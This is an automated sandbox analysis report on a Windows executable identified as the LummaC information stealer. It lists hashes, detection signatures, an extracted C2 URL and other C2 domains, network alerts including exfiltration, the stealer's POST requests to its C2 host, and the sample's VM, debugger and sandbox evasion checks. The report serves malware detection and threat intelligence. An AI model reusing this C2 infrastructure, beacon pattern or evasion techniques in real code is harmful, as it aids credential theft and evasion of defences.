Windows Analysis Report
random(3).exe

Overview

General Information

Sample name: random(3).exe
Analysis ID: 1629896
MD5: 8d0cbd77e8d4828aa0df4bb88339f6ac
SHA1: bf2ba197991b59779d1215188ff56deb9b151751
SHA256: 665aee3342bfb1b567acb0d3a130b55bd9dac6ffa01e669f410c3d6c47440b38
Tags: 176-113-115-7exeuser-JAMESWT_MHT
Infos:

Detection

LummaC Stealer
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Hides threads from debuggers
Joe Sandbox ML detected suspicious sample
PE file contains section with special chars
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Detected potential crypto function
Entry point lies outside standard sections
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • random(3).exe (PID: 7468 cmdline: "C:\Users\user\Desktop\random(3).exe" MD5: 8D0CBD77E8D4828AA0DF4BB88339F6AC)
  • cleanup
{"C2 url": "https://explorebieology.run/api", "Build Version": "1vJIvk--mix"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |
      No Sigma rule has matched
      Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
      2025-03-05T09:16:49.071576+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49731 | 104.21.31.208 | 443 | TCP
      2025-03-05T09:16:49.825660+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49732 | 104.21.31.208 | 443 | TCP
      2025-03-05T09:16:51.093749+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49733 | 104.21.31.208 | 443 | TCP
      2025-03-05T09:16:51.795991+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49734 | 104.21.31.208 | 443 | TCP
      2025-03-05T09:16:52.438897+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49735 | 104.21.31.208 | 443 | TCP
      2025-03-05T09:16:49.253351+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49731 | 104.21.31.208 | 443 | TCP
      2025-03-05T09:16:49.961907+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49732 | 104.21.31.208 | 443 | TCP
      2025-03-05T09:16:56.996140+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49735 | 104.21.31.208 | 443 | TCP
      2025-03-05T09:16:49.253351+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.4 | 49731 | 104.21.31.208 | 443 | TCP
      2025-03-05T09:16:49.071576+0100 | 2060537 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49731 | 104.21.31.208 | 443 | TCP
      2025-03-05T09:16:49.825660+0100 | 2060537 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49732 | 104.21.31.208 | 443 | TCP
      2025-03-05T09:16:51.093749+0100 | 2060537 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49733 | 104.21.31.208 | 443 | TCP
      2025-03-05T09:16:51.795991+0100 | 2060537 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49734 | 104.21.31.208 | 443 | TCP
      2025-03-05T09:16:52.438897+0100 | 2060537 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49735 | 104.21.31.208 | 443 | TCP
      2025-03-05T09:16:48.563335+0100 | 2060536 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 56173 | 1.1.1.1 | 53 | UDP
      2025-03-05T09:16:48.550726+0100 | 2060538 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 56647 | 1.1.1.1 | 53 | UDP
      2025-03-05T09:16:51.907434+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49734 | 104.21.31.208 | 443 | TCP

      AV Detection

      Source: random(3).exe | Avira: detected
      Source: random(3).exe.7468.0.memstrmin | Malware Configuration Extractor: LummaC {"C2 url": "https://explorebieology.run/api", "Build Version": "1vJIvk--mix"}
      Source: random(3).exe | ReversingLabs: Detection: 52%
      Source: random(3).exe | Virustotal: Detection: 58%
      Source: Submited Sample | Integrated Neural Analysis Model: Matched 100.0% probability
      Source: 00000000.00000002.1881912769.00000000007F1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: gadgethgfub.icu
      Source: 00000000.00000002.1881912769.00000000007F1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: explorebieology.run
      Source: 00000000.00000002.1881912769.00000000007F1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: moderzysics.top
      Source: 00000000.00000002.1881912769.00000000007F1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: techmindzs.live
      Source: 00000000.00000002.1881912769.00000000007F1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: codxefusion.top
      Source: 00000000.00000002.1881912769.00000000007F1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: phygcsforum.life
      Source: 00000000.00000002.1881912769.00000000007F1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: techspherxe.top
      Source: random(3).exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: unknown | HTTPS traffic detected: 104.21.31.208:443 -> 192.168.2.4:49731 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 104.21.31.208:443 -> 192.168.2.4:49732 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 104.21.31.208:443 -> 192.168.2.4:49733 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 104.21.31.208:443 -> 192.168.2.4:49734 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 104.21.31.208:443 -> 192.168.2.4:49735 version: TLS 1.2

      Networking

      Source: Network traffic | Suricata IDS: 2060538 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (gadgethgfub .icu) : 192.168.2.4:56647 -> 1.1.1.1:53
      Source: Network traffic | Suricata IDS: 2060536 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (explorebieology .run) : 192.168.2.4:56173 -> 1.1.1.1:53
      Source: Network traffic | Suricata IDS: 2060537 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (explorebieology .run in TLS SNI) : 192.168.2.4:49733 -> 104.21.31.208:443
      Source: Network traffic | Suricata IDS: 2060537 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (explorebieology .run in TLS SNI) : 192.168.2.4:49734 -> 104.21.31.208:443
      Source: Network traffic | Suricata IDS: 2060537 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (explorebieology .run in TLS SNI) : 192.168.2.4:49735 -> 104.21.31.208:443
      Source: Network traffic | Suricata IDS: 2060537 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (explorebieology .run in TLS SNI) : 192.168.2.4:49731 -> 104.21.31.208:443
      Source: Network traffic | Suricata IDS: 2060537 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (explorebieology .run in TLS SNI) : 192.168.2.4:49732 -> 104.21.31.208:443
      Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49732 -> 104.21.31.208:443
      Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49731 -> 104.21.31.208:443
      Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49735 -> 104.21.31.208:443
      Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 104.21.31.208:443
      Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49734 -> 104.21.31.208:443
      Source: Malware configuration extractor | URLs: https://explorebieology.run/api
      Source: Joe Sandbox View | IP Address: 104.21.31.208
      Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
      Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 104.21.31.208:443
      Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49734 -> 104.21.31.208:443
      Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49735 -> 104.21.31.208:443
      Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 104.21.31.208:443
      Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 104.21.31.208:443
      Source: global traffic | HTTP traffic detected:
        POST /api HTTP/1.1
        Connection: Keep-Alive
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
        Content-Length: 8
        Host: explorebieology.run
      Source: global traffic | HTTP traffic detected:
        POST /api HTTP/1.1
        Connection: Keep-Alive
        Content-Type: application/x-www-form-urlencoded
        Cookie: __cf_mw_byp=btftl_ryNDDPEjPOe8h.lFWa37zBj0raEj9lH67Dfn0-1741162609.1950147-0.0.1.1-/api
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
        Content-Length: 55
        Host: explorebieology.run
      Source: global traffic | HTTP traffic detected:
        POST /api HTTP/1.1
        Connection: Keep-Alive
        Content-Type: multipart/form-data; boundary=R8O1JPR0WPW2Q00M2I
        Cookie: __cf_mw_byp=btftl_ryNDDPEjPOe8h.lFWa37zBj0raEj9lH67Dfn0-1741162609.1950147-0.0.1.1-/api
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
        Content-Length: 2603
        Host: explorebieology.run
      Source: global traffic | HTTP traffic detected:
        POST /api HTTP/1.1
        Connection: Keep-Alive
        Content-Type: multipart/form-data; boundary=OK0048YRWNYO4Q3GT
        Cookie: __cf_mw_byp=btftl_ryNDDPEjPOe8h.lFWa37zBj0raEj9lH67Dfn0-1741162609.1950147-0.0.1.1-/api
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
        Content-Length: 1090
        Host: explorebieology.run
      Source: global traffic | HTTP traffic detected:
        POST /api HTTP/1.1
        Connection: Keep-Alive
        Content-Type: application/x-www-form-urlencoded
        Cookie: __cf_mw_byp=btftl_ryNDDPEjPOe8h.lFWa37zBj0raEj9lH67Dfn0-1741162609.1950147-0.0.1.1-/api
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
        Content-Length: 89
        Host: explorebieology.run
      Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global traffic | DNS traffic detected: DNS query: gadgethgfub.icu
      Source: global traffic | DNS traffic detected: DNS query: explorebieology.run
      Source: unknown | HTTP traffic detected:
        POST /api HTTP/1.1
        Connection: Keep-Alive
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
        Content-Length: 8
        Host: explorebieology.run
      Source: global traffic | HTTP traffic detected:
        HTTP/1.1 403 Forbidden
        Date: Wed, 05 Mar 2025 08:16:49 GMT
        Content-Type: text/html; charset=utf-8
        Transfer-Encoding: chunked
        Connection: close
        Server: cloudflare
        CF-RAY: 91b82c637e5b4340-EWR
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Mar 2025 08:16:49 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pQfy1LdxvUTyiUbDp2E9z0V9d31ShChakR%2F1Le9oK0po3aR7NOJyAkXtXDWQoI9iv2k%2FPcLvKRp%2FFzCucfDMQUIP%2Bosw4tXskrnDP%2BPX4ANQRZ%2FFRrHZVhmO5N8oRdU%2FDQ1nOCBm"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91b82c67e9574b06-EWR
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Mar 2025 08:16:51 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0trmLZJ6HKorLNrdY1BcLIZ%2FtlS%2F%2Fqb5xOZaWhxCCGkwF8UB4p3zcJ8tm0%2FXhR9qTPX5QriTTU6t0%2F73OWiuMuuE0p5qbtOUoOGMC7WeJTy06jbPOkeF%2FPcIL1nQXh4ES2j56eQd"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91b82c6fab2bb2c0-EWR
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Mar 2025 08:16:51 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BiPaux6v1b0HNb3qxYmezt31JHTj2qTdQCHn0pN%2FPJjdTU83j7PioS%2F4SX864GXakme67138nOwjn0BuVMu3RwTjVaEfruJ7zpZQl30fUZ4Hme2Zq5OVLLDItUtT8riwY3809Z%2F6"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91b82c741ac37a99-EWR

      System Summary

      Source: random(3).exe Static PE information: section name:
      Source: random(3).exe Static PE information: section name: .idata
      Source: C:\Users\user\Desktop\random(3).exe Code function: String function: 007FB210 appears 48 times
      Source: C:\Users\user\Desktop\random(3).exe Code function: String function: 0080B0F0 appears 116 times
      Source: random(3).exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: random(3).exe Static PE information: Section: ZLIB complexity 0.9981049408783784
      Source: classification engine Classification label: mal100.troj.evad.winEXE@1/0@2/1
      Source: C:\Users\user\Desktop\random(3).exe Code function: 0_2_0082A3E0 CoCreateInstance, 0_2_0082A3E0
      Source: C:\Users\user\Desktop\random(3).exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: random(3).exe ReversingLabs: Detection: 52%
      Source: random(3).exe Virustotal: Detection: 58%
      Source: random(3).exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
      Source: C:\Users\user\Desktop\random(3).exe File read: C:\Users\user\Desktop\random(3).exe
      Source: C:\Users\user\Desktop\random(3).exe Section loaded: apphelp.dll
      Source: C:\Users\user\Desktop\random(3).exe Section loaded: winmm.dll
      Source: C:\Users\user\Desktop\random(3).exe Section loaded: windows.storage.dll
      Source: C:\Users\user\Desktop\random(3).exe Section loaded: wldp.dll
      Source: C:\Users\user\Desktop\random(3).exe Section loaded: winhttp.dll
      Source: C:\Users\user\Desktop\random(3).exe Section loaded: ondemandconnroutehelper.dll
      Source: C:\Users\user\Desktop\random(3).exe Section loaded: webio.dll
      Source: C:\Users\user\Desktop\random(3).exe Section loaded: mswsock.dll
      Source: C:\Users\user\Desktop\random(3).exe Section loaded: iphlpapi.dll
      Source: C:\Users\user\Desktop\random(3).exe Section loaded: winnsi.dll
      Source: C:\Users\user\Desktop\random(3).exe Section loaded: sspicli.dll
      Source: C:\Users\user\Desktop\random(3).exe Section loaded: dnsapi.dll
      Source: C:\Users\user\Desktop\random(3).exe Section loaded: rasadhlp.dll
      Source: C:\Users\user\Desktop\random(3).exe Section loaded: ondemandconnroutehelper.dll
      Source: C:\Users\user\Desktop\random(3).exe Section loaded: fwpuclnt.dll
      Source: C:\Users\user\Desktop\random(3).exe Section loaded: schannel.dll
      Source: C:\Users\user\Desktop\random(3).exe Section loaded: mskeyprotect.dll
      Source: C:\Users\user\Desktop\random(3).exe Section loaded: ntasn1.dll
      Source: C:\Users\user\Desktop\random(3).exe Section loaded: ncrypt.dll
      Source: C:\Users\user\Desktop\random(3).exe Section loaded: ncryptsslp.dll
      Source: C:\Users\user\Desktop\random(3).exe Section loaded: msasn1.dll
      Source: C:\Users\user\Desktop\random(3).exe Section loaded: cryptsp.dll
      Source: C:\Users\user\Desktop\random(3).exe Section loaded: rsaenh.dll
      Source: C:\Users\user\Desktop\random(3).exe Section loaded: cryptbase.dll
      Source: C:\Users\user\Desktop\random(3).exe Section loaded: gpapi.dll
      Source: C:\Users\user\Desktop\random(3).exe Section loaded: dpapi.dll
      Source: C:\Users\user\Desktop\random(3).exe Section loaded: ondemandconnroutehelper.dll
      Source: C:\Users\user\Desktop\random(3).exe Section loaded: kernel.appcore.dll
      Source: C:\Users\user\Desktop\random(3).exe Section loaded: uxtheme.dll
      Source: C:\Users\user\Desktop\random(3).exe Section loaded: wbemcomn.dll
      Source: C:\Users\user\Desktop\random(3).exe Section loaded: amsi.dll
      Source: C:\Users\user\Desktop\random(3).exe Section loaded: userenv.dll
      Source: C:\Users\user\Desktop\random(3).exe Section loaded: profapi.dll
      Source: C:\Users\user\Desktop\random(3).exe Section loaded: version.dll
      Source: C:\Users\user\Desktop\random(3).exe Section loaded: ondemandconnroutehelper.dll
      Source: C:\Users\user\Desktop\random(3).exe Section loaded: ondemandconnroutehelper.dll
      Source: C:\Users\user\Desktop\random(3).exe Section loaded: ondemandconnroutehelper.dll
      Source: random(3).exeStatic file information: File size 3042304 > 1048576
      Source: random(3).exeStatic PE information: Raw size of bxbbqwne is bigger than: 0x100000 < 0x2b4e00

      Data Obfuscation

      Source: C:\Users\user\Desktop\random(3).exe, Unpacked PE file: 0.2.random(3).exe.7f0000.0.unpack :EW;.rsrc:W;.idata :W;bxbbqwne:EW;wovautmq:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;bxbbqwne:EW;wovautmq:EW;.taggant:EW;
      Source: initial sample, Static PE information: section where entry point is pointing to: .taggant
      Source: random(3).exe, Static PE information: real checksum: 0x2f1f11 should be: 0x2f1158
      Source: random(3).exe, Static PE information: section name:
      Source: random(3).exe, Static PE information: section name: .idata
      Source: random(3).exe, Static PE information: section name: bxbbqwne
      Source: random(3).exe, Static PE information: section name: wovautmq
      Source: random(3).exe, Static PE information: section name: .taggant
      Source: random(3).exe, Static PE information: section name: entropy: 7.980403044384576

      Boot Survival

      Source: C:\Users\user\Desktop\random(3).exe, Window searched: window name: FilemonClass
      Source: C:\Users\user\Desktop\random(3).exe, Window searched: window name: PROCMON_WINDOW_CLASS
      Source: C:\Users\user\Desktop\random(3).exe, Window searched: window name: RegmonClass
      Source: C:\Users\user\Desktop\random(3).exe, Window searched: window name: Regmonclass
      Source: C:\Users\user\Desktop\random(3).exe, Window searched: window name: Filemonclass
      Source: C:\Users\user\Desktop\random(3).exe, Process information set: NOOPENFILEERRORBOX

      Malware Analysis System Evasion

      Source: C:\Users\user\Desktop\random(3).exe, WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
      Source: C:\Users\user\Desktop\random(3).exe, System information queried: FirmwareTableInformation
      Source: C:\Users\user\Desktop\random(3).exe, File opened: HKEY_CURRENT_USER\Software\Wine
      Source: C:\Users\user\Desktop\random(3).exe, File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A11A6E second address: A11A8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F998484EB18h 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A11A8A second address: A11ADD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9984B08D17h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e mov si, 7700h 0x00000012 push 00000000h 0x00000014 add dword ptr [ebp+122D291Eh], esi 0x0000001a push 00000000h 0x0000001c mov dword ptr [ebp+122D25B1h], esi 0x00000022 xchg eax, ebx 0x00000023 jmp 00007F9984B08D18h 0x00000028 push eax 0x00000029 pushad 0x0000002a push eax 0x0000002b push edx 0x0000002c push ecx 0x0000002d pop ecx 0x0000002e rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A162A2 second address: A162A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A171EB second address: A171FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 jl 00007F9984B08D0Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A17385 second address: A173A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F998484EB19h 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A1839D second address: A183A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A173A2 second address: A173B1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A19232 second address: A19236 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A183A3 second address: A183A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A173B1 second address: A173B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A19236 second address: A19296 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push 00000000h 0x0000000e push edi 0x0000000f call 00007F998484EB08h 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], edi 0x00000019 add dword ptr [esp+04h], 00000017h 0x00000021 inc edi 0x00000022 push edi 0x00000023 ret 0x00000024 pop edi 0x00000025 ret 0x00000026 call 00007F998484EB0Ah 0x0000002b mov dword ptr [ebp+122D1ED8h], edx 0x00000031 pop ebx 0x00000032 and di, B561h 0x00000037 push 00000000h 0x00000039 push edi 0x0000003a mov dword ptr [ebp+1244FCACh], ebx 0x00000040 pop edi 0x00000041 push eax 0x00000042 push eax 0x00000043 push edx 0x00000044 push edx 0x00000045 jmp 00007F998484EB10h 0x0000004a pop edx 0x0000004b rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A183A8 second address: A183B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F9984B08D06h 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A173B7 second address: A173BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A183B2 second address: A18457 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F9984B08D0Fh 0x0000000e nop 0x0000000f xor edi, 16A3F060h 0x00000015 push dword ptr fs:[00000000h] 0x0000001c add edi, dword ptr [ebp+122D2B54h] 0x00000022 mov dword ptr fs:[00000000h], esp 0x00000029 movsx ebx, cx 0x0000002c mov eax, dword ptr [ebp+122D00A9h] 0x00000032 push 00000000h 0x00000034 push ecx 0x00000035 call 00007F9984B08D08h 0x0000003a pop ecx 0x0000003b mov dword ptr [esp+04h], ecx 0x0000003f add dword ptr [esp+04h], 00000017h 0x00000047 inc ecx 0x00000048 push ecx 0x00000049 ret 0x0000004a pop ecx 0x0000004b ret 0x0000004c mov edi, 2B1730EDh 0x00000051 jmp 00007F9984B08D0Bh 0x00000056 push FFFFFFFFh 0x00000058 push 00000000h 0x0000005a push ebx 0x0000005b call 00007F9984B08D08h 0x00000060 pop ebx 0x00000061 mov dword ptr [esp+04h], ebx 0x00000065 add dword ptr [esp+04h], 00000017h 0x0000006d inc ebx 0x0000006e push ebx 0x0000006f ret 0x00000070 pop ebx 0x00000071 ret 0x00000072 jmp 00007F9984B08D0Eh 0x00000077 push eax 0x00000078 push eax 0x00000079 push edx 0x0000007a jno 00007F9984B08D08h 0x00000080 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A1A3A1 second address: A1A3A7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A1A3A7 second address: A1A3AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A1B3B3 second address: A1B3B9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A1C3DC second address: A1C3ED instructions: 0x00000000 rdtsc 0x00000002 ja 00007F9984B08D08h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A1B3B9 second address: A1B3C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F998484EB06h 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A1A4CC second address: A1A4D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A1F335 second address: A1F339 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
